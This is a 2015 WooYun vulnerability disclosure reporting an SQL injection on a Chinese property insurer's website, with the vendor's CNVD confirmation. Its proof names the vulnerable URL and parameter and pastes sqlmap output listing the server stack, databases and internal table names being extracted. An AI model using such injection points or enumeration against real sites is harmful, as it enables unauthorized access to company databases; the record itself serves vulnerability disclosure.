当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129914

漏洞标题:泰山财产保险官网SQL一枚

相关厂商:泰山财产保险

漏洞作者: 雅柏菲卡

提交时间:2015-07-28 15:10

修复时间:2015-09-15 15:26

公开时间:2015-09-15 15:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-08-01: 厂商已经确认,细节仅向厂商公开
2015-08-11: 细节向核心白帽子及相关领域专家公开
2015-08-21: 细节向普通白帽子公开
2015-08-31: 细节向实习白帽子公开
2015-09-15: 细节向公众公开

简要描述:

........

详细说明:

...............

漏洞证明:

http://www.taishanpic.com/tshbx/PortalContentList.aspx?Category=91522111-d240-494e-b20c-d3a94b09a505*
注:*号为注入点
available databases [6]:
[*] master
[*] model
[*] msdb
[*] oabase
[*] oabase0425
[*] tempdb
[03:31:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[03:31:02] [INFO] fetching tables for database 'oabase'
[03:31:02] [INFO] fetching number of tables for database 'oabase'
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': 1165
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.AclOwnerType
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity_PostRuleNames
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity_PreRuleNames
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activity_RawParticipants
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.Activiy_Reeceivers
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.AgentManager
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_AddGoodsInfos
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_FLGoods
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsBuyApply
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsInfos
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsProvideInfos
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_GoodsStorage
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_RefundGoods
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.BGYP_StoreHouse
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.CL_DriverInfos
[03:31:02] [INFO] retrieving the length of query output
[03:31:02] [INFO] read from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': 26
[03:31:02] [INFO] resumed from file 'C:\Python27\sqlmap\output\www.taishanpic.com\session': dbo.CL_VhicleA...
[03:31:02] [INFO] retrieving pending 12 query output characters
[03:31:18] [INFO] retrieved: __pl_c___o_s 5/12 (42%)[03:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the reque
[03:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:31:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:31:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:31:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:31:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:31:32] [INFO] retrieved: A_pl_c__io_s 7/12 (58%)[03:31:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the reque
[03:31:35] [INFO] retrieved: Applic__io_s 9/12 (75%)[03:31:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the reque
[03:31:49] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:31:53] [INFO] retrieved: Applica_io_s 10/12 (83%)[03:31:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requ
[03:32:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:32:15] [INFO] retrieved: Applicatio_s 11/12 (92%)[03:32:20] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requ
[03:32:23] [INFO] retrieved: Applications
[03:32:23] [INFO] retrieving the length of query output
[03:32:23] [INFO] retrieved: [03:32:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:33:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
24[03:33:36] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:33:50] [INFO] retrieved: ____C___e_ic____________ 4/24 (17%)[03:33:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to ret
[03:33:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:33:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:09] [INFO] retrieved: dbo.C__Vehic____________ 10/24 (42%)[03:34:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re
[03:34:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:22] [INFO] retrieved: dbo.C__Vehicle_l_a__nf__ 16/24 (67%)[03:34:24] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re
[03:34:24] [INFO] retrieved: dbo.C__Vehicle_l_a__nfo_ 17/24 (71%)[03:34:25] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re
[03:34:28] [INFO] retrieved: dbo.CL_Vehicle_l_a__nfo_ 19/24 (79%)[03:34:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re
[03:34:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:38] [INFO] retrieved: dbo.CL_VehicleClean_nfo_ 22/24 (92%)[03:34:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re
[03:34:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:34:59] [INFO] retrieved: dbo.CL_VehicleCleanInfo_ 23/24 (96%)[03:35:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to re
[03:35:29] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:35:31] [INFO] retrieved: dbo.CL_VehicleCleanInfos
[03:35:31] [INFO] retrieving the length of query output
[03:35:31] [INFO] retrieved: 19
[03:35:58] [INFO] retrieved: _______V__ic_______ 3/19 (16%)[03:36:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry th
[03:36:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:36:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[03:36:00] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:02] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:02] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:04] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:06] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:07] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:23] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:25] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:25] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:28] [ERROR] thread 10: unable to connect to the target url or proxy
[03:36:29] [CRITICAL] something unexpected happened inside the threads


修复方案:

............

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-01 15:24

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论